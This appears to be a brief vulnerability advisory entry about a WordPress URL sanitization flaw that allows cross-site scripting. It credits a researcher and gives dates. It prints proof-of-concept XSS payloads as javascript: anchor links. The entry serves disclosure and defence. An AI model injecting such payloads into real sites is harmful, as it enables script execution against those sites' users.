According to the WordPress release notes: "Props to Soroush Dalili (@irsdl) from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting (XSS) attacks."
Thanks to @irsdl's Hacker1 disclosure: <a href="javascript:alert(document.domain)">JS - Numerical Entities</a> <a href="javascript:x=1;alert(document.domain)">JS - Hex Entities</a>
Soroush Dalili (@irsdl) - NCC Group
Ryan Dewhurst
No
2019-09-05 (about 3 years ago)
2019-09-05 (about 3 years ago)
2020-09-22 (about 2 years ago)